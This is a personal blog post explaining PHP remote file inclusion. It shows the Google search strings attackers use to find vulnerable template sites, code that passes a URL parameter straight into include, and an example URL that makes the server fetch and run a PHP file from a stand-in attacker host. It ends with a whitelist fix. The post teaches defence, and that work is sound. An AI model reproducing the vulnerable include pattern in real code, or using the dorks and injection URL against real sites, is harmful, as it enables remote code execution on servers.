I was scanning through my site logs and stumbled accross some suspect google searches that lead to my site. Here’s a break down:

4 for allinurl index.php?page=
1 for allinurl php?page=
1 for index.php?page=
1 for allinurl .php?page= .php
1 for allinurl .php?page=

That’s 8 for just this past month of Feb. What are they searching for. Basically, these crackers are looking for an insecure php website that allows these clowns to run their code on your server. If you don’t know what php is, get on over to php.net and find out. Alot of tutorials on the web guide noobies along on how to create a template based php design. The goal for these types of tutorials is that the webmaster creates one index.php file. This file contains all the graphics and creates a container around the actually content of the page. For instance, visit OpenSoft Dev. My software site uses this design. Everything is created in the index.php file and then the content page (Home Page, About Page, Products Page, etc) is inserted in the middle. The php way to do this is through the code:


include 'products.php';


This code will load the php file inside the other php file. This is a great concept. It allows the designer to only create one page template. Then, whenever the template needs to be changed, you can change it only once. The problem from this is how most people carry out the actual page chooser.

The typical way to easily insert the wanted page inside the container is below (I’m breaking it up to describe what is going on):


if ($_GET["page"] == "") {
$place = "home";
}
else {
$place = $_GET["page"];
}
?>


This code will typically come very near the top. The $_GET function will pull the parameter from the URL. Have you ever seen those urls like


http://www.blah.com/query.php?q=myquery&t=1&s=11


In this url, there would be 3 parameters, “q,” “t,” and “s.” In php these parameters are then pulled and put into our variable $place. Next, we put this code where we want our inner pages to be displayed:


include $place;


Sirens ring. You’ve just been tricked. You will become the favorite target of many lame hackers around. If you don’t see the problem, imagine this. Some cracker comes along. Types into google: allinurl index.php?page=. He then looks around smugly. He finds your url (lets imagine its www.blah.com). He comes to your homepage:


www.blah.com/index.php?page=home


He simply alters the url a little to be:


www.blah.com/index.php?page=http://www.some-lame-cracker-site.com/cracks/wjs22s.php


Screwed! The $place will equal that url he typed, and then you just include that code from some random server onto your server and execute it. It could be anything. So, what do we do? I actually had this happen to me last summer. Luckily the crackers didn’t screw with anything, so it was ok. Here’s the fix:


$page = $_GET["page"];
if (!$page) {
include "home.php";
}

else if($page=="home") { include "home.php"; }
else if($page=="about") { include "about.php"; }
else if($page=="products") { include "products.php"; }
else if($page=="developers") { include "developers.php"; }
else { echo "SCREW YOU HACKERS!!! or possibly the user typed
the url wrong, so probably a 404 would be better"; }
?>

This is a little less clean, but it will keep your servers clean and protected. What we do here is simply limit what strings are allowed. We only allow the $page to be our allowed strings, and we only include the specified php files on our local server.

I hope ya’ll will use php templating carefully and use this as a guide to help keep your servers safe.

-Dustin

« Lets Celebrate! Afterwards! | AH Gets 2nd in TCEA Programming Competition »